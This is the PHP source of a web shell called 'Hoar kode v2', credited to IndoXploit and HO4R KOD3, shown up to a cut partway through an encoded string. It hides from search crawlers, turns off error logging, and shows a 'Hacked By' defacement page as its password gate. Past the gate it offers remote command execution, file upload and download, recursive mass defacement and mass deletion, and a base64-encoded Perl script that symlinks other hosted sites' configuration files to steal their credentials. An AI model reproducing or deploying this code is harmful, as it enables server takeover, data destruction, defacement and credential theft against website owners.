Hoar kode v2

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "2ae66f90b7788ab8950e8f81b829c947"; // default: IndoXploit
14. $color = "green";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28.  
29. <html>
30. <head>
31. <meta http-equiv="Content-Language" content="en-us">
32.  
33. <meta content="Hacked By anon" name="description"/>
34. <meta content="Hacked By anon" name="keywords"/>
35. <meta content="Hacked By anon" name="Abstract"/>
36.  
37.  
38. <link rel="icon" href="">
39. <title>Hacked By HO4R KOD3</title>
40.  
41. <link href='https://fonts.googleapis.com/css?family=Alegreya+Sans:400,800' rel='stylesheet' type='text/css'>
42. <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
43. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
44. <style>
45. .headin{
46. font-family: 'Iceland', sans-serif;
47. text-align:right;
48. float:right;
49. font-weight: bolder;
50. }
51. .msg{
52. font-family: 'Iceland', sans-serif;
53. float:right;
54. position: fixed;
55. bottom: 10px;
56. right: 10px;
57. text-align:right;
58. font-weight: bolder;
59. }
60.  
61. body{
62. background-color:black;
63. font-family: "Open Sans", Impact;
64. background: url(https://hdqwalls.com/download/blood-blockade-battlefront-5j-1336x768.jpg) no-repeat center center fixed;
65. -webkit-background-size: cover;
66. -moz-background-size: cover;
67. -o-background-size: cover;
68. background-size: cover;
69.  
70. }
71. .bottm{
72. position: absolute;
73. bottom: 10;
74. left: 0;
75. padding-left:15px;
76.  
77. }
78. .bottm2{
79. position: absolute;
80. bottom: 10;
81. right: 10;
82. padding-left:15px;
83.  
84. }
85. .pop{
86. height:100px;
87. width:100px;
88.  
89. }
90. .pop:hover{
91. height:120px;
92. width:120px;
93. }
94.  
95. </style>
96. <script type="text/javascript">
97.  
98. <!--
99.  
100. //Disable right click script
101.  
102. //visit http://www.rainbow.arch.scriptmania.com/scripts/
103.  
104. var message="_|_";
105.  
106. ///////////////////////////////////
107.  
108. function clickIE() {if (document.all) {(message);return false;}}
109.  
110. function clickNS(e) {if
111.  
112. (document.layers||(document.getElementById&&!document.all)) {
113.  
114. if (e.which==2||e.which==3) {(message);return false;}}}
115.  
116. if (document.layers)
117.  
118. {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
119.  
120. else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
121.  
122. document.oncontextmenu=new Function("return false")
123.  
124. // -->
125.  
126. </script>
127. <script>
128. function fo()
129. {
130.  
131. alert(" Hacked By HO4R KOD3
132. Bangladeshi Muslim Hacker
133. Security Breached!
134. #TeaM_CC ");
135.  
136.  
137. }
138. </script>
139. </head>
140. <body onload="fo()">
141. <div class="headin">
142. <font style="text-shadow:0px 5px 5px #33fc05;" color="white" size="7pt">#Hacked By </font>
143. <br>
144. <font style="text-shadow:0px 5px 5px #ff3a4d;;" color="white" size="8pt">./HO4R KOD3</font><br><br><br>
145. <a href="https://www.facebook.com/hoarkode"><img class="pop" src="http://findicons.com/files/icons/2844/creative_blot_icons_set/512/social_media_icons_blot_icons_set_512x512_0000_facebook.png" alt=" HOAR KODE on Facebook" height="100px" width="100px"></a><br>
146. <br>
147. <a href="https://www.twitter.com/hoar_kode"><img class="pop" src="https://cdn0.iconfinder.com/data/icons/getsoci-2/1460/getsoci5.png" alt="HOAR KODE on Twitter" height="100px" width="100px" /></a>
148.  
149.  
150. </div>
151. <div class="msg">
152.  
153. <br>
154. <pre align="right">
155. <form method="post">
156. <input type="password" name="pass">
157. </form></pre>
158. <font style="text-shadow:0px 5px 5px #ff3a4d;" color="white" size="6pt">#Silense is the most powerfull Scream</font><br>
159. <font style="text-shadow:0px 5px 5px #33fc05;" color="white" size="6pt">#Power that can not be imagined</font><br>
160. <font style="text-shadow:0px 5px 5px #ff3a4d;;" color="white" size="6pt">#Hack to Survive!</font><br>
161. <font style="text-shadow:0px 5px 5px #33fc05;" color="white" size="6pt">#Strength That can not be compared</font><br>
162.  
163. </div>
164. <div class="bottm">
165. <font face="Iceland" style="color:white;text-shadow:0px 1px 5px #000;font-size:30px">@Bangladeshi <font face="Iceland" style="color:red;text-shadow:0px 1px 5px #000;font-size:30px">Muslim</font> Hacker</font><br>
166. <iframe width="0" height="0" src="https://www.youtube.com/embed/SMvk6xbU-OI?rel=0&autoplay=1" frameborder="0" allowfullscreen></iframe>
167. </div>
168. </body>
169. </html>
170.  
171.  
172. <?php
173. exit;
174. }
175. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
176. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
177. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
178. else
179. login_shell();
180. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
181. @ob_clean();
182. $file = $_GET['file'];
183. header('Content-Description: File Transfer');
184. header('Content-Type: application/octet-stream');
185. header('Content-Disposition: attachment; filename="'.basename($file).'"');
186. header('Expires: 0');
187. header('Cache-Control: must-revalidate');
188. header('Pragma: public');
189. header('Content-Length: ' . filesize($file));
190. readfile($file);
191. exit;
192. }
193. ?>
194. <html>
195. <head>
196. <title>HOAR KODE SHELL</title>
197. <link rel="SHORTCUT ICON" href="" type="image/gif">
198.  
199. <meta name='author' content='IndoXploit'>
200. <meta charset="UTF-8">
201. <style type='text/css'>
202. @import url(https://fonts.googleapis.com/css?family=Exo+2|Roboto);
203. html {
204. background: url(https://hdqwalls.com/download/anime-original-minimalism-p5-1336x768.jpg) no-repeat center center fixed;
205. -webkit-background-size: cover;
206. -moz-background-size: cover;
207. -o-background-size: cover;
208. background-size: cover;
209. font-family: 'Roboto', sans-serif;
210. font-family: 'Exo 2', sans-serif;
211. font-size: 14px;
212. width: 100%;
213. }
214. li {
215. display: inline;
216. margin: 0px;
217. padding: 0px;
218. }
219. table, th, td {
220. border-collapse:collapse;
221. font-family: Tahoma, Geneva, sans-serif;
222. background: transparent;
223. font-family: 'Roboto', sans-serif;
224. font-family: 'Exo 2', sans-serif;
225. font-size: 14px;
226. }
227. .table_home, .th_home, .td_home {
228. border: 0px solid green;
229. }
230. th {
231. padding: 10px;
232. }
233. a {
234. color: green;
235. text-decoration: none;
236. }
237. a:hover {
238. color: red;
239. text-decoration:;
240. }
241. b {
242. color:green;
243. }
244. input[type=text], input[type=password],input[type=submit] {
245. background: transparent;
246. color: green;
247. border: 0px solid green;
248. margin: 5px auto;
249. padding-left: 5px;
250. font-family: 'Roboto';
251. font-size: 14px;
252. }
253. textarea {
254. border: 0px solid green;
255. width: 100%;
256. height: 400px;
257. padding-left: 5px;
258. margin: 10px auto;
259. resize: none;
260. background: transparent;
261. color: green;
262. font-family: 'Roboto', sans-serif;
263. font-family: 'Exo 2', sans-serif;
264.  
265. font-size: 14px;
266. }
267. select {
268. width: 152px;
269. background: green;
270. color: green;
271. border: 0px solid green;
272. margin: 5px auto;
273. padding-left: 5px;
274. font-family: 'Roboto', sans-serif;
275. font-family: 'Exo 2', sans-serif;
276.  
277. font-size: 14px;
278. }
279. option:hover {
280. background: green;
281. color: green;
282. }
283. </style>
284. </head>
285. <?php
286. ###############################################################################
287. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
288. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
289. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
290. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
291. // Greetz: All Member IndoXploit. & all my friends.
292. ###############################################################################
293. function w($dir,$perm) {
294. if(!is_writable($dir)) {
295. return "<font color=red>".$perm."</font>";
296. } else {
297. return "<font color=green>".$perm."</font>";
298. }
299. }
300. function r($dir,$perm) {
301. if(!is_readable($dir)) {
302. return "<font color=red>".$perm."</font>";
303. } else {
304. return "<font color=green>".$perm."</font>";
305. }
306. }
307. function exe($cmd) {
308. if(function_exists('system')) {
309. @ob_start();
310. @system($cmd);
311. $buff = @ob_get_contents();
312. @ob_end_clean();
313. return $buff;
314. } elseif(function_exists('exec')) {
315. @exec($cmd,$results);
316. $buff = "";
317. foreach($results as $result) {
318. $buff .= $result;
319. } return $buff;
320. } elseif(function_exists('passthru')) {
321. @ob_start();
322. @passthru($cmd);
323. $buff = @ob_get_contents();
324. @ob_end_clean();
325. return $buff;
326. } elseif(function_exists('shell_exec')) {
327. $buff = @shell_exec($cmd);
328. return $buff;
329. }
330. }
331. function perms($file){
332. $perms = fileperms($file);
333. if (($perms & 0xC000) == 0xC000) {
334. // Socket
335. $info = 's';
336. } elseif (($perms & 0xA000) == 0xA000) {
337. // Symbolic Link
338. $info = 'l';
339. } elseif (($perms & 0x8000) == 0x8000) {
340. // Regular
341. $info = '-';
342. } elseif (($perms & 0x6000) == 0x6000) {
343. // Block special
344. $info = 'b';
345. } elseif (($perms & 0x4000) == 0x4000) {
346. // Directory
347. $info = 'd';
348. } elseif (($perms & 0x2000) == 0x2000) {
349. // Character special
350. $info = 'c';
351. } elseif (($perms & 0x1000) == 0x1000) {
352. // FIFO pipe
353. $info = 'p';
354. } else {
355. // Unknown
356. $info = 'u';
357. }
358. // Owner
359. $info .= (($perms & 0x0100) ? 'r' : '-');
360. $info .= (($perms & 0x0080) ? 'w' : '-');
361. $info .= (($perms & 0x0040) ?
362. (($perms & 0x0800) ? 's' : 'x' ) :
363. (($perms & 0x0800) ? 'S' : '-'));
364. // Group
365. $info .= (($perms & 0x0020) ? 'r' : '-');
366. $info .= (($perms & 0x0010) ? 'w' : '-');
367. $info .= (($perms & 0x0008) ?
368. (($perms & 0x0400) ? 's' : 'x' ) :
369. (($perms & 0x0400) ? 'S' : '-'));
370. // World
371. $info .= (($perms & 0x0004) ? 'r' : '-');
372. $info .= (($perms & 0x0002) ? 'w' : '-');
373. $info .= (($perms & 0x0001) ?
374. (($perms & 0x0200) ? 't' : 'x' ) :
375. (($perms & 0x0200) ? 'T' : '-'));
376. return $info;
377. }
378. function hdd($s) {
379. if($s >= 1073741824)
380. return sprintf('%1.2f',$s / 1073741824 ).' GB';
381. elseif($s >= 1048576)
382. return sprintf('%1.2f',$s / 1048576 ) .' MB';
383. elseif($s >= 1024)
384. return sprintf('%1.2f',$s / 1024 ) .' KB';
385. else
386. return $s .' B';
387. }
388. function ambilKata($param, $kata1, $kata2){
389. if(strpos($param, $kata1) === FALSE) return FALSE;
390. if(strpos($param, $kata2) === FALSE) return FALSE;
391. $start = strpos($param, $kata1) + strlen($kata1);
392. $end = strpos($param, $kata2, $start);
393. $return = substr($param, $start, $end - $start);
394. return $return;
395. }
396. function getsource($url) {
397. $curl = curl_init($url);
398. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
399. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
400. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
401. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
402. $content = curl_exec($curl);
403. curl_close($curl);
404. return $content;
405. }
406. function bing($dork) {
407. $npage = 1;
408. $npages = 30000;
409. $allLinks = array();
410. $lll = array();
411. while($npage <= $npages) {
412. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
413. if($x) {
414. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
415. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
416. $npage = $npage + 10;
417. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
418. } else break;
419. }
420. $URLs = array();
421. foreach($allLinks as $url){
422. $exp = explode("/", $url);
423. $URLs[] = $exp[2];
424. }
425. $array = array_filter($URLs);
426. $array = array_unique($array);
427. $sss = count(array_unique($array));
428. foreach($array as $domain) {
429. echo $domain."\n";
430. }
431. }
432. function reverse($url) {
433. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
434. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
435. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
436. curl_setopt($ch, CURLOPT_HEADER, 0);
437. curl_setopt($ch, CURLOPT_POST, 1);
438. $resp = curl_exec($ch);
439. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
440. $array = explode(",,", $resp);
441. unset($array[0]);
442. foreach($array as $lnk) {
443. $lnk = "http://$lnk";
444. $lnk = str_replace(",", "", $lnk);
445. echo $lnk."\n";
446. ob_flush();
447. flush();
448. }
449. curl_close($ch);
450. }
451. if(get_magic_quotes_gpc()) {
452. function idx_ss($array) {
453. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
454. }
455. $_POST = idx_ss($_POST);
456. $_COOKIE = idx_ss($_COOKIE);
457. }
458.  
459. if(isset($_GET['dir'])) {
460. $dir = $_GET['dir'];
461. chdir($dir);
462. } else {
463. $dir = getcwd();
464. }
465. $kernel = php_uname();
466. $ip = gethostbyname($_SERVER['HTTP_HOST']);
467. $dir = str_replace("\\","/",$dir);
468. $scdir = explode("/", $dir);
469. $freespace = hdd(disk_free_space("/"));
470. $total = hdd(disk_total_space("/"));
471. $used = $total - $freespace;
472. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
473. $ds = @ini_get("disable_functions");
474. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
475. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
476. $wget = (exe('wget --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
477. $perl = (exe('perl --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
478. $python = (exe('python --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
479. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=green>NONE</font>";
480. if(!function_exists('posix_getegid')) {
481. $user = @get_current_user();
482. $uid = @getmyuid();
483. $gid = @getmygid();
484. $group = "?";
485. } else {
486. $uid = @posix_getpwuid(posix_geteuid());
487. $gid = @posix_getgrgid(posix_getegid());
488. $user = $uid['name'];
489. $uid = $uid['uid'];
490. $group = $gid['name'];
491. $gid = $gid['gid'];
492. }
493. echo "SYSTEM: <font color=#00cc00>".$kernel."</font><br>";
494. echo "USER: <font color=#00cc00>".$user."</font> (".$uid.") Group: <font color=#00cc00>".$group."</font> (".$gid.")<br>";
495. echo "SERVER IP- <font color=#00cc00>".$ip."</font> | HO4R KOD3'S IP- <font color=#00cc00>".$_SERVER['REMOTE_ADDR']."</font><br>";
496. echo "HDD: <font color=#00cc00>$used</font> / <font color=#00cc00>$total</font> ( Free: <font color=#00cc00>$freespace</font> )<br>";
497. echo "SAFE MODE: $sm<br>";
498. echo "DISABLE FUNNCTIONS: $show_ds<br>";
499. echo "MYSQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
500. echo "CURRENT DIR: ";
501. foreach($scdir as $c_dir => $cdir) {
502. echo "<a href='?dir=";
503. for($i = 0; $i <= $c_dir; $i++) {
504. echo $scdir[$i];
505. if($i != $c_dir) {
506. echo "/";
507. }
508. }
509. echo "'>$cdir</a>/";
510. }
511. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
512. echo "<center>";
513. echo "<ul>";
514. echo "<li>[ <a href='?'>HOME</a> ]</li>";
515. echo "<li>[ <a href='?dir=$dir&do=upload'>UPLOAD</a> ]</li>";
516. echo "<li>[ <a href='?dir=$dir&do=cmd'>COMMAND</a> ]</li>";
517. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>MASS DEFACE</a> ]</li>";
518. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>MASS DELETE</a> ]</li>";
519. echo "<li>[ <a href='?dir=$dir&do=config'>CONFIG GRAB</a> ]</li>";
520. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
521. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPANEL CRAKER</a> ]</li>";
522. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP GRABBER</a> ]</li>";
523. echo "<li>[ <a href='?dir=$dir&do=zoneh'>ZONE-H POSTTER</a> ]</li>";
524. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI TELNET</a> ]</li>";
525. echo "<li>[ <a href='?dir=$dir&do=network'>BACKCONNET</a> ]</li>";
526. echo "<li>[ <a href='?dir=$dir&do=adminer'>ADMINER</a> ]</li><br>";
527. echo "<li>[ <a href='?dir=$dir&do=fake_root'>FAKE ROOT</a> ]</li>";
528. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>WP AUTO USER EDIT</a> ]</li>";
529. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>WP AUTO TITLE CHANGER</a> ]</li>";
530. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WP AUTO DEFACE</a> ]</li>";
531. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WP AUTO DEFACE V.2</a> ]</li>";
532. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPANEL/FTP AUTO DEFACE</a> ]</li>";
533. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP SHELL</a> ]</li>";
534. echo "<li>[ <a href='?dir=$dir&do=sym'>ho4rkod3 SYM</a> ]</li>";
535. echo "<li>[ <a href='?dir=$dir&do=symlink'>MANUAL SYMLINK</a> ]</li>";
536. echo "<li>[ <a href='?dir=$dir&do=mini'>MINI SHELL</a> ]</li>";
537. echo "<li>[ <a href='?dir=$dir&do=alfa'>Alfa SHELL</a> ]</li>";
538. echo "<li>[ <a style='color: red;' href='?logout=true'>BYE HO4R KOD3</a> ]</li>";
539. echo "</ul>";
540. echo "</center>";
541. if($_GET['logout'] == true) {
542. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
543. echo "<script>window.location='?';</script>";
544. } elseif($_GET['do'] == 'upload') {
545. echo "<center>";
546. if($_POST['upload']) {
547. if($_POST['tipe_upload'] == 'upload') {
548. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
549. $act = "<font color=green>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
550. } else {
551. $act = "<font color=red>FAILED TO UPLOAD</font>";
552. }
553. } else {
554. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
555. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
556. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
557. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
558. $act = "<font color=green>UPLOADED</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
559. } else {
560. $act = "<font color=red>FAILED TO UPLOAD</font>";
561. }
562. } else {
563. $act = "<font color=red>FAILED TO UPLOAD</font>";
564. }
565. }
566. }
567. echo "Upload File:
568. <form method='post' enctype='multipart/form-data'>
569. <input type='radio' name='tipe_upload' value='upload' checked>Upload [ ".w($dir,"Writeable")." ]
570. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
571. <input type='file' name='ix_file'>
572. <input type='submit' value='upload' name='upload'>
573. </form>";
574. echo $act;
575. echo "</center>";
576. } elseif($_GET['do'] == 'cmd') {
577. echo "<form method='post'>
578. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
579. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
580. </form>";
581. if($_POST['do_cmd']) {
582. echo "<pre>".exe($_POST['cmd'])."</pre>";
583. }
584. } elseif($_GET['do'] == 'mass_deface') {
585. function sabun_massal($dir,$namafile,$isi_script) {
586. if(is_writable($dir)) {
587. $dira = scandir($dir);
588. foreach($dira as $dirb) {
589. $dirc = "$dir/$dirb";
590. $lokasi = $dirc.'/'.$namafile;
591. if($dirb === '.') {
592. file_put_contents($lokasi, $isi_script);
593. } elseif($dirb === '..') {
594. file_put_contents($lokasi, $isi_script);
595. } else {
596. if(is_dir($dirc)) {
597. if(is_writable($dirc)) {
598. echo "[<font color=green>DONE</font>] $lokasi<br>";
599. file_put_contents($lokasi, $isi_script);
600. $idx = sabun_massal($dirc,$namafile,$isi_script);
601. }
602. }
603. }
604. }
605. }
606. }
607. function sabun_upload($dir,$namafile,$isi_script) {
608. if(is_writable($dir)) {
609. $dira = scandir($dir);
610. foreach($dira as $dirb) {
611. $dirc = "$dir/$dirb";
612. $lokasi = $dirc.'/'.$namafile;
613. if($dirb === '.') {
614. file_put_contents($lokasi, $isi_script);
615. } elseif($dirb === '..') {
616. file_put_contents($lokasi, $isi_script);
617. } else {
618. if(is_dir($dirc)) {
619. if(is_writable($dirc)) {
620. echo "[<font color=green>DONE</font>] $dirb/$namafile<br>";
621. file_put_contents($lokasi, $isi_script);
622. }
623. }
624. }
625. }
626. }
627. }
628. if($_POST['start']) {
629. if($_POST['tipe_sabun'] == 'mahal') {
630. echo "<div style='margin: 5px auto; padding: 5px'>";
631. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
632. echo "</div>";
633. } elseif($_POST['tipe_sabun'] == 'murah') {
634. echo "<div style='margin: 5px auto; padding: 5px'>";
635. sabun_upload($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
636. echo "</div>";
637. }
638. } else {
639. echo "<center>";
640. echo "<form method='post'>
641. <font style='text-decoration: underline;'>TYPE OF DEFACE:</font><br>
642. <input type='radio' name='tipe_sabun' value='murah' checked>Upload<input type='radio' name='tipe_sabun' value='mahal'>Mass Dir<br>
643. <font style='text-decoration: underline;'>Folder:</font><br>
644. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
645. <font style='text-decoration: underline;'>Filename:</font><br>
646. <input type='text' name='d_file' value='kode.txt' style='width: 450px;' height='10'><br>
647. <font style='text-decoration: underline;'>Index File:</font><br>
648. <textarea name='script' style='width: 450px; height: 200px;'>HACKED BY HO4R KOD3 </textarea><br>
649. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
650. </form></center>";
651. }
652. } elseif($_GET['do'] == 'mass_delete') {
653. function hapus_massal($dir,$namafile) {
654. if(is_writable($dir)) {
655. $dira = scandir($dir);
656. foreach($dira as $dirb) {
657. $dirc = "$dir/$dirb";
658. $lokasi = $dirc.'/'.$namafile;
659. if($dirb === '.') {
660. if(file_exists("$dir/$namafile")) {
661. unlink("$dir/$namafile");
662. }
663. } elseif($dirb === '..') {
664. if(file_exists("".dirname($dir)."/$namafile")) {
665. unlink("".dirname($dir)."/$namafile");
666. }
667. } else {
668. if(is_dir($dirc)) {
669. if(is_writable($dirc)) {
670. if(file_exists($lokasi)) {
671. echo "[<font color=green>DELETED</font>] $lokasi<br>";
672. unlink($lokasi);
673. $idx = hapus_massal($dirc,$namafile);
674. }
675. }
676. }
677. }
678. }
679. }
680. }
681. if($_POST['start']) {
682. echo "<div style='margin: 5px auto; padding: 5px'>";
683. hapus_massal($_POST['d_dir'], $_POST['d_file']);
684. echo "</div>";
685. } else {
686. echo "<center>";
687. echo "<form method='post'>
688. <font style='text-decoration: underline;'>Folder:</font><br>
689. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
690. <font style='text-decoration: underline;'>Filename:</font><br>
691. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
692. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
693. </form></center>";
694. }
695. } elseif($_GET['do'] == 'config') {
696. $idx = mkdir("Kod3_Configs", 0777);
697. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
698. $htc = fopen("Kod3_Configs/.htaccess","w");
699. fwrite($htc, $isi_htc);
700. fclose($htc);
701. if(preg_match("/vhosts|vhost/", $dir)) {
702. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
703. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3